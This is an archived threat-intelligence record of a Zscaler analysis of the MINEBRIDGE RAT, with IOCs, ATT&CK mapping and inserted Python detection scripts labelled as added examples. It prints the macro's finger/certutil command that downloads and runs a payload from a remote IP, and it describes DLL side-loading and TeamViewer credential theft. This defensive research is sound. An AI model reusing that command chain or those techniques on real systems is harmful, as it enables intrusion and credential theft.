{
	"id": "847a3fc9-fd53-4e81-b305-f8a4d4580dec",
	"created_at": "2026-04-06T00:18:45.343005Z",
	"updated_at": "2026-04-10T03:36:37.042271Z",
	"deleted_at": null,
	"sha1_hash": "c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6",
	"title": "MINEBRIDGE Remote-access Trojan (RAT) 2021 | Zscaler Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2275889,
	"plain_text": "MINEBRIDGE Remote-access Trojan (RAT) 2021 | Zscaler Blog\r\nBy Sudeep Singh, Sahil Antil\r\nPublished: 2021-02-23 · Archived: 2026-04-02 12:02:17 UTC\r\nIntroduction\r\nIn Jan 2021, Zscaler ThreatLabZ discovered new instances of the MINEBRIDGE remote-access Trojan (RAT)\r\nembedded in macro-based Word document files crafted to look like valid job resumes (CVs). Such lures are often\r\nused as social engineering schemes by threat actors.\r\nMINEBRIDGE buries itself into the vulnerable remote desktop software TeamViewer, enabling the threat actor to\r\ntake a wide array of remote follow-on actions such as spying on users or deploying additional malware.\r\nWe have recently observed other instances of threat actors targeting security researchers with social engineering\r\ntechniques. While the threat actor we discuss in this blog is not the same, the use of social engineering tactics\r\ntargeting security teams appears to be on an upward trend.\r\nWe also observed a few changes in the tactics, techniques, and procedures (TTPs) of the threat actor since the last\r\ninstance of MINEBRIDGE RAT was observed in March 2020. In this blog, we provide insights into the changes\r\nin TTPs, threat attribution, command-and-control (C\u0026C)  infrastructure, and a technical analysis of the attack\r\nflow.\r\n \r\nThreat attribution\r\nThis attack was likely carried out by TA505, a financially motivated threat group that has been active since at least\r\n2014. TA505 has been previously linked to very similar attacks using MINEBRIDGE RAT. The job resume theme\r\nand C\u0026C infrastructure used in this new instance is consistent and in line with these former attacks. 
Due to the low volume of samples we identified for this new attack, we attribute it to the same threat actor with moderate confidence.\r\n \r\nAttack flow\r\nFigure 1 below details the attack flow.\r\nhttps://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures\r\nPage 1 of 16\n\nFigure 1: Attack flow\r\nMacro technical analysis\r\nFor the purpose of technical analysis of the attack flow, we will look at the macro-based Word document with the MD5 hash f95643710018c437754b8a11cc943348.\r\nWhen the Word document is opened and the macros are enabled, it displays the message “File successfully converted from PDF” for social engineering purposes.\r\nThis message is followed by the decoy document. Figure 2 shows the contents of the decoy document, which resemble the job resume (CV) of a threat intelligence analyst.\r\nFigure 2: Decoy file using the CV of a security researcher for social engineering purposes\r\nThe macro code uses basic string obfuscation, as shown in Figure 3.\r\nFigure 3: Contents of the obfuscated macro\r\nIt constructs the following command line and then executes it using Windows Management Instrumentation (WMI).\r\nCommand line: cmd /C finger nc20@184.164.146.102 \u003e %appdata%\\vUCooUr \u003e\u003e %appdata%\\vUCooUr1 \u0026\u0026 certutil -decode %appdata%\\vUCooUr1 %appdata%\\vUCooUr.exe \u0026\u0026cmd /C del %appdata%\\vUCooUr1 \u0026\u0026 %appdata%\\vUCooUr.exe\r\nThis command leverages the Windows utility finger.exe to download encoded content from the IP 
address 184.164.146.102 and drops it in the %appdata% directory. The encoded content is decoded using the legitimate Windows utility certutil.exe and then executed. finger.exe is an ordinary client for the finger protocol (TCP port 79); the attacker's host simply answers the query for user nc20 with the encoded payload, and cmd.exe redirects that answer into a file.\r\nThe use of finger.exe to download the encoded content from the C\u0026C server is one of the major TTP changes by this threat actor.\r\nWe see an increase in the use of living-off-the-land binaries (LOLBins) by the threat actor to download, decode, and execute content in this new instance.\r\n \r\nStage 1: SFX archive\r\nThe content decoded using certutil.exe is a self-extracting archive (SFX), which we describe in this section of the blog.\r\nMD5 hash of SFX archive: 73b7b416d3e5b1ed0aa49bda20f7729a\r\nContents of the SFX archive are shown in Figure 4. It spoofs a legitimate TeamViewer application.\r\nFigure 4: Contents of the SFX archive\r\nUpon execution, this SFX archive drops the legitimate TeamViewer binaries, a few DLLs, and some document files.\r\nExecution flow starts with the binary called defrender.exe, which is named to look like a Windows Defender binary.\r\nStage 2: DLL side-loading\r\nThe dropped binary defrender.exe is a legitimate TeamViewer application, version 11.2.2150.0, which is vulnerable to DLL side-loading. Upon execution, it loads the msi.dll present in the same directory: the application directory is searched before the system directory, so the attacker's copy wins over the genuine msi.dll in System32. This msi.dll is the file that performs further malicious activity on the system.\r\nNext, msi.dll unpacks a shellcode and executes it. 
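The delivery chain above (finger.exe as the downloader, certutil -decode, a payload launched from %appdata%) and the msi.dll side-load are both visible in endpoint telemetry. The Python below is an added example, not Zscaler's code and not part of the original post: it classifies constructed process-creation and image-load records, and the field names (type, cmdline, image, loaded_dll) are assumptions to be mapped onto your own EDR or Sysmon schema. It deliberately goes a little beyond the macro's command line and also covers the bitsadmin and regsvr32 variants that appear later in this analysis.

```python
'''Classify endpoint telemetry for the LOLBin delivery chain and the DLL
side-load described above. Added example (not Zscaler's code); the sample
records are constructed and the field names are assumptions.'''

# Locations a standard user can write to; a program starting or a DLL
# loading from here deserves more scrutiny than one under System32.
USER_WRITABLE = ('%appdata%', '%temp%', '%programdata%',
                 '\\appdata\\', '\\temp\\', '\\programdata\\')
SYSTEM_DIRS = ('\\windows\\system32\\', '\\windows\\syswow64\\')
# System DLL names worth watching when they load from an application
# directory. msi.dll is the one abused here; extend from your own baseline.
SIDELOAD_NAMES = {'msi.dll'}
DOWNLOADERS = {'finger_download', 'certutil_download', 'bits_download'}


def _basename(token):
    name = token.rsplit('\\', 1)[-1].rsplit('/', 1)[-1]
    return name[:-4] if name.endswith('.exe') else name


def _subcommands(cmdline):
    '''Split a cmd.exe line on &&, & and | and drop output redirections, so
    each chained program can be examined on its own.'''
    lowered = cmdline.lower().replace('&&', '&').replace('||', '|').replace('|', '&')
    result = []
    for chunk in lowered.split('&'):
        tokens, skip_next = [], False
        for tok in chunk.split():
            if skip_next:                 # the file name after > or >>
                skip_next = False
                continue
            if tok in ('>', '>>', '<'):
                skip_next = True
                continue
            if tok[0] in '<>':            # '>file' written without a space
                continue
            tokens.append(tok)
        if tokens:
            result.append(tokens)
    return result


def _program(tokens):
    '''Return (program token, basename, args), skipping a leading cmd /c wrapper.'''
    while len(tokens) >= 2 and _basename(tokens[0]) == 'cmd' and tokens[1] in ('/c', '/k'):
        tokens = tokens[2:]
    if not tokens:
        return '', '', []
    return tokens[0], _basename(tokens[0]), tokens[1:]


def _user_writable(path):
    return any(marker in path for marker in USER_WRITABLE)


def classify_process(cmdline):
    '''Return the set of suspicious behaviours found in one process command line.'''
    findings = set()
    for tokens in _subcommands(cmdline):
        full, name, args = _program(tokens)
        if name == 'finger' and any('@' in a for a in args):
            findings.add('finger_download')   # finger user@host with output captured to a file
        elif name == 'certutil' and ('-decode' in args or '-decodehex' in args):
            findings.add('certutil_decode')
        elif name == 'certutil' and '-urlcache' in args:
            findings.add('certutil_download')
        elif name == 'bitsadmin' and any(a in ('/transfer', '/addfile') for a in args):
            findings.add('bits_download')
        elif name == 'regsvr32' and any(a.endswith('.dll') and _user_writable(a) for a in args):
            findings.add('regsvr32_user_writable_dll')
        elif _user_writable(full):
            findings.add('exec_from_user_writable')
    # A fetch combined with a decode or a launch in one line is the chain the macro builds.
    if findings & DOWNLOADERS and findings & {'certutil_decode', 'exec_from_user_writable'}:
        findings.add('lolbin_download_execute_chain')
    return findings


def classify_image_load(image, loaded_dll):
    '''Flag a system DLL name loaded from outside System32/SysWOW64; loading it
    from the executable's own directory is the side-load pattern of defrender.exe.'''
    dll, exe = loaded_dll.lower(), image.lower()
    if dll.rsplit('\\', 1)[-1] not in SIDELOAD_NAMES or any(d in dll for d in SYSTEM_DIRS):
        return None
    if dll.rsplit('\\', 1)[0] == exe.rsplit('\\', 1)[0]:
        return 'dll_sideload_same_directory'
    return 'dll_sideload_nonsystem_path'


# Constructed records: the macro's command line from the analysis above, two
# benign uses of the same tools, the stage-2 side-load, and a normal msi.dll load.
SAMPLE_EVENTS = [
    {'type': 'process', 'cmdline': 'cmd /C finger nc20@184.164.146.102 > %appdata%\\vUCooUr >> %appdata%\\vUCooUr1 && certutil -decode %appdata%\\vUCooUr1 %appdata%\\vUCooUr.exe &&cmd /C del %appdata%\\vUCooUr1 && %appdata%\\vUCooUr.exe'},
    {'type': 'process', 'cmdline': 'certutil -verify C:\\certs\\server.cer'},
    {'type': 'process', 'cmdline': 'finger'},
    {'type': 'image_load', 'image': 'C:\\ProgramData\\Local Tempary\\defrender.exe',
     'loaded_dll': 'C:\\ProgramData\\Local Tempary\\msi.dll'},
    {'type': 'image_load', 'image': 'C:\\Windows\\System32\\msiexec.exe',
     'loaded_dll': 'C:\\Windows\\System32\\msi.dll'},
]


def scan(events):
    '''Return (event index, finding) pairs for every suspicious event.'''
    hits = []
    for i, ev in enumerate(events):
        if ev['type'] == 'process':
            hits.extend((i, f) for f in sorted(classify_process(ev['cmdline'])))
        elif ev['type'] == 'image_load':
            finding = classify_image_load(ev['image'], ev['loaded_dll'])
            if finding:
                hits.append((i, finding))
    return hits


if __name__ == '__main__':
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding)
```

The chain rule fires only when a download behaviour and a decode or launch appear in the same command line; a lone certutil -verify or an interactive finger with no user@host argument is left alone, which keeps the rule usable on hosts where administrators really do use these tools.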
The part of the code responsible for shellcode unpacking and execution is shown in Figure 5.\r\nFigure 5: Shellcode unpacking and execution\r\nThe shellcode further unpacks another DLL with MD5 hash 59876020bb9b99e9de93f1dd2b14c7e7 from a hardcoded offset, maps it into memory, and finally transfers code execution to its entry point. The unpacked DLL is a UPX-packed binary of MINEBRIDGE RAT.\r\n \r\nStage 3: MINEBRIDGE RAT DLL\r\nOn unpacking the UPX layer we get the main MINEBRIDGE RAT DLL with MD5 hash 23edc18075533a4bb79b7c4ef71ff314.\r\n \r\nExecution checks\r\nAt the very beginning, MINEBRIDGE RAT confirms that the DLL is not being executed via regsvr32.exe or rundll32.exe.\r\nThen it checks the command-line argument and performs the following operations:\r\n1. If the command-line argument is __RESTART__, it sleeps for 5 seconds and then performs the operations described further below.\r\n2. If the command-line argument is __START__, it starts a BITS job to download a zip file-based payload and then performs the operations described further below.\r\nFigure 6 shows the relevant command-line checks performed by MINEBRIDGE RAT.\r\nFigure 6: Module name and command-line argument check\r\n \r\nBITS job download\r\nThe BITS job downloads a zip file from a C\u0026C domain selected at random from the hardcoded list inside the DLL, using the path “/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin”. The downloaded archive is written to the hardcoded filename “~f834ygf8yrubgfy4sd23.bin” in the %temp% directory. 
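The BITS fetch just described, and the RAT's own HTTPS check-in (the command list and the exfiltration format string appear below under C&C communication and Indicators of compromise), can be matched on the proxy side using the hardcoded C2 domains, the URI paths, the fixed iPhone Safari User-Agent and the layout of the form-encoded body. The Python below is an added example, not Zscaler's code and not part of the original post: the proxy-log records are constructed, and the record fields (host, method, path, user_agent, body, client_os) are assumptions to be mapped onto your own proxy or TLS-inspection logs.

```python
'''Proxy-side detection of MINEBRIDGE C2 traffic: known domains and paths,
the hardcoded User-Agent, and the form-encoded check-in body. Added example
(not Zscaler's code); records are constructed and field names are assumptions.'''
from urllib.parse import parse_qs

C2_DOMAINS = {
    'billionaireshore.top', 'vikingsofnorth.top', 'realityarchitector.top',
    'gentlebouncer.top', 'brainassault.top', 'greatersky.top',
    'unicornhub.top', 'corporatelover.top', 'bloggersglobbers.top',
}
C2_PATHS = {
    '/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin',
    '/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin',
    '/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php',
}
HARDCODED_UA = ('Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) '
                'AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1')
# Field order of the exfiltration format string listed in the IOC section.
CHECKIN_FIELDS = ('uuid', 'id', 'pass', 'username', 'pcname', 'osver', 'timeout')


def parse_checkin(body):
    '''Parse the form-encoded check-in. Returns a dict of the seven fields, or
    None when the body does not match the layout (a field missing or repeated,
    or a non-numeric timeout).'''
    fields = parse_qs(body, keep_blank_values=True)
    if any(len(fields.get(name, [])) != 1 for name in CHECKIN_FIELDS):
        return None
    flat = {name: fields[name][0] for name in CHECKIN_FIELDS}
    if not flat['timeout'].isdigit():
        return None
    flat['timeout'] = int(flat['timeout'])
    return flat


def analyse(record):
    '''Return (indicators, exposure) for one proxy-log record. The captured
    TeamViewer password is never copied into the result: only its presence is
    reported, so the alert can drive a credential rotation without leaking it.'''
    indicators = []
    exposure = None
    if record['host'].lower() in C2_DOMAINS:
        indicators.append('known_c2_domain')
    if record['path'] in C2_PATHS:
        indicators.append('known_c2_path')
    ua = record.get('user_agent', '')
    if ua == HARDCODED_UA:
        indicators.append('hardcoded_user_agent')
    # An iOS browser string from a Windows endpoint is the behavioural form of the same IOC.
    if 'iphone' in ua.lower() and record.get('client_os', '').lower() == 'windows':
        indicators.append('ios_ua_from_windows_host')
    if record['method'] == 'POST':
        checkin = parse_checkin(record.get('body', ''))
        if checkin:
            indicators.append('minebridge_checkin_format')
            exposure = {
                'bot_id': checkin['uuid'],
                'teamviewer_id': checkin['id'],
                'password_captured': bool(checkin['pass']),
                'user': checkin['username'] + '@' + checkin['pcname'],
                'beacon_interval': checkin['timeout'],
            }
    return indicators, exposure


# Constructed records: a check-in POST, the BITS payload fetch, ordinary desktop
# browsing, and a real phone for which the iPhone User-Agent is expected.
SAMPLE_RECORDS = [
    {'host': 'billionaireshore.top', 'method': 'POST',
     'path': '/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php', 'user_agent': HARDCODED_UA,
     'client_os': 'windows',
     'body': 'uuid=1a2b3c4d&id=123456789&pass=s3cr3t&username=alice&pcname=DESKTOP-01&osver=10.0.19041&timeout=60'},
    {'host': 'vikingsofnorth.top', 'method': 'GET',
     'path': '/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin', 'user_agent': 'Microsoft BITS/7.8',
     'client_os': 'windows', 'body': ''},
    {'host': 'www.example.com', 'method': 'GET', 'path': '/index.html',
     'user_agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/88.0',
     'client_os': 'windows', 'body': ''},
    {'host': 'www.example.com', 'method': 'GET', 'path': '/',
     'user_agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X)',
     'client_os': 'ios', 'body': ''},
]


def scan(records):
    '''Return [(index, indicators, exposure)] for records with at least one indicator.'''
    out = []
    for i, rec in enumerate(records):
        indicators, exposure = analyse(rec)
        if indicators:
            out.append((i, indicators, exposure))
    return out


if __name__ == '__main__':
    for index, indicators, exposure in scan(SAMPLE_RECORDS):
        print(index, indicators, exposure)
```

The exposure record is the part a responder actually needs: the TeamViewer ID in the body identifies the installation whose password was just shipped to the operator, so that ID should be treated as fully compromised and the password rotated, independently of whether the host itself gets reimaged.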
When the download is completed, the zip file is extracted to “%ProgramData%\\VolumeDrive\\”.\r\nFigure 7 shows the relevant code section responsible for using bitsadmin to download the payload.\r\nFigure 7: BITS job to download the payload file and extract it to %ProgramData%\\VolumeDrive\\\r\nAfter performing the above-mentioned checks, it loads the legitimate msi.dll from the %System32% directory to initialize its own export address table. This is done to prevent the host application from crashing when any of the export functions are called: the calls can be passed on to the genuine library. It then generates the BOT_ID after some computations with the VolumeSerialNumber.\r\nFigure 8: Export address table initialization and BOT_ID generation\r\nAPI Hooking\r\nMINEBRIDGE RAT then uses the mhook library to hook the following APIs, intercepting the calls in order to keep the malicious code execution from becoming visible to the user:\r\nMessageBoxA\r\nMessageBoxW\r\nSetWindowTextW\r\nIsWindowVisible\r\nDialogBoxParamW\r\nShowWindow\r\nRegisterClassExW\r\nCreateWindowExW\r\nCreateDialogParamW\r\nShell_NotifyIconW\r\nShellExecuteExW\r\nGetAdaptersInfo\r\nRegCreateKeyExW\r\nSetCurrentDirectoryW\r\nCreateMutexW\r\nCreateMutexA\r\nCreateFileW\r\nGetVolumeInformationW\r\nSince the last observed instance of this attack in 2020, a few more APIs have been added to the hook list (highlighted in bold in the original post), but interestingly the project path leaked by the mhook module remains unchanged:\r\nC:\\users\\maximys\\desktop\\eric_guft@jabbeer.com\\mhook_lib\\mhook_lib\\disasm-lib\\disasm.c\r\nFinally, if all the APIs are hooked successfully, MINEBRIDGE RAT creates three 
threads in a sequence that perform the following tasks:\r\n1. The first thread is responsible for C\u0026C communication and for achieving persistence.\r\n2. The second thread records when the last user input occurred, to determine whether the system is idle.\r\n3. The third thread kills the ShowNotificationDialog process regularly to avoid any notification pop-ups.\r\nFigure 9: Hooks APIs and creates threads\r\nPersistence\r\nFor persistence, MINEBRIDGE RAT creates a LNK file named “Windows Logon.lnk” in the Startup directory. The LNK file points to the currently executing binary, uses the same icon as “wlrmdr.exe”, and carries the description “Windows Logon”.\r\nFigure 10: LNK file properties showing target path and icon source\r\nC\u0026C communication\r\nMINEBRIDGE RAT supports the following C\u0026C commands:\r\n●    drun_command\r\n●    rundll_command\r\n●    update_command\r\n●    restart_command\r\n●    terminate_command\r\n●    kill_command\r\n●    poweroff_command\r\n●    reboot_command\r\n●    Setinterval_command\r\nAt the time of analysis, we did not receive any active response from the C2 server. However, based on the code flow, the communication mechanism appears to be the same as in previously reported attack instances. A detailed analysis of the C2 communication can be found in the earlier report linked from the original post.\r\nAlternate attack flow\r\nThe MINEBRIDGE RAT DLL can also be executed via regsvr32.exe. The malicious code is present inside the DllRegisterServer export. 
When executed via regsvr32.exe or rundll32.exe, the DllMain routine performs no actions, but regsvr32.exe also calls the DllRegisterServer export implicitly and, hence, the malicious code inside DllRegisterServer gets executed.\r\nInterestingly, the check at the very beginning of the code inside the DllRegisterServer export verifies that the process name is regsvr32.exe and only then executes the code further.\r\nWe did not see this regsvr32.exe code path triggered in the current attack instance, but it fits with what has been reported in earlier instances by FireEye and in the advisory report, with a few changes in filenames and payload directory.\r\nFigure 11: Payload download from DllRegisterServer export\r\n \r\nZscaler Cloud Sandbox report\r\nFigure 12 shows the sandbox detection for the macro-based document used in the attack.\r\nFigure 12: Zscaler Cloud Sandbox detection\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.\r\nWin32.Backdoor.MINEBRIDGE\r\nVBA.Downloader.MINEBRIDGE\r\nMITRE ATT\u0026CK TTP Mapping\r\nID | Technique | Description\r\nT1566.001 | Spearphishing Attachment | Uses .doc attachments with a VBA macro\r\nT1204.002 | User Execution: Malicious File | User opens the document file and enables the VBA macro\r\nT1547.001 | Registry Run Keys / Startup Folder | Creates a LNK file in the Startup folder for payload execution\r\nT1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads\r\nT1036.005 | Masquerading: Match Legitimate Name or Location | File name chosen to resemble the legitimate Windows Defender binary\r\nT1027.002 | Obfuscated Files or 
Information: Software Packing | Payloads are packed in layers\r\nT1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses a legitimate TeamViewer binary vulnerable to DLL side-loading\r\nT1218 | Signed Binary Proxy Execution | Uses finger.exe to download the encoded payload and certutil.exe to decode it\r\nT1056.002 | Input Capture: GUI Input Capture | Captures the TeamViewer-generated UserID and password by hooking GUI APIs\r\nT1057 | Process Discovery | Verifies the name of the parent process\r\nT1082 | System Information Discovery | Gathers OS version information\r\nT1033 | System Owner/User Discovery | Gathers the currently logged-in username\r\nT1071.001 | Application Layer Protocol: Web Protocols | Uses HTTPS for C\u0026C communication\r\nT1041 | Exfiltration Over C\u0026C Channel | Data is exfiltrated over the existing C2 channel\r\nIndicators of compromise\r\nDocument hashes\r\nf95643710018c437754b8a11cc943348\r\n41c8f361278188b77f96c868861c111e\r\nFilenames\r\nMarisaCV.doc\r\nRicardoITCV.doc\r\nBinary hashes\r\n73b7b416d3e5b1ed0aa49bda20f7729a [SFX archive]\r\nd12c80de0cf5459d96dfca4924f65144 [msi.dll]\r\n59876020bb9b99e9de93f1dd2b14c7e7 [UPX-packed MineBridge RAT]\r\n23edc18075533a4bb79b7c4ef71ff314 [unpacked MineBridge RAT]\r\nC\u0026C domains\r\n// Below is a comprehensive list of C\u0026C domains related to this threat actor\r\nbillionaireshore.top\r\nvikingsofnorth.top\r\nrealityarchitector.top\r\ngentlebouncer.top\r\nbrainassault.top\r\ngreatersky.top\r\nunicornhub.top\r\ncorporatelover.top\r\nbloggersglobbers.top\r\nNetwork paths\r\n// The network paths below are accessed by MineBridge RAT using either HTTP GET or POST requests\r\n/~4387gfoyusfh_gut/~3fog467wugrgfgd43r9.bin\r\n/~8f3g4yogufey8g7yfg/~dfb375y8ufg34gfyu.bin\r\n/~munhgy8fw6egydubh/9gh3yrubhdkgfby43.php\r\nUser-agent:\r\n\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like 
Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B150 Safari/604.1\"\r\nNetwork data fetch using finger.exe\r\n// Format: username@ip_address\r\nnc20@184.164.146.102\r\nDownloaded files\r\n// Payloads are dropped in the following paths\r\n%temp%/~f834ygf8yrubgfy4sd23.bin\r\n%temp%/~t62btc7rbg763vbywgr6734.bin\r\n%appdata%\\vUCooUr1\r\n%appdata%\\vUCooUr.exe\r\n%programdata%\\Local Tempary\\defrender.exe\r\n%programdata%\\Local Tempary\\msi.dll\r\n%programdata%\\Local Tempary\\TeamViewer_Desktop.exe\r\n%programdata%\\Local Tempary\\TeamViewer_Resource_en.dll\r\n%programdata%\\Local Tempary\\TeamViewer_StaticRes.dll\r\n{STARTUP}\\Windows Logon.lnk\r\nExfiltrated user and system info\r\n// Format string\r\nuuid=%s\u0026id=%s\u0026pass=%s\u0026username=%s\u0026pcname=%s\u0026osver=%s\u0026timeout=%d\r\nThe table below summarises the meaning of the individual fields.\r\nField name | Purpose\r\nuuid | BOT_ID generated from the volume serial number\r\nid | TeamViewer ID of the user\r\npass | TeamViewer password\r\nusername | Currently logged-in user name\r\npcname | Name of the computer\r\nosver | Operating system version\r\ntimeout | Timeout between requests\r\nSource: https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures"
	],
	"report_names": [
		"return-minebridge-rat-new-ttps-and-social-engineering-lures"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434725,
	"ts_updated_at": 1775792197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6.pdf",
		"text": "https://archive.orkl.eu/c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6.txt",
		"img": "https://archive.orkl.eu/c72baf1ff6896e45ed2d0a38385e7d3c66dae2f6.jpg"
	}
}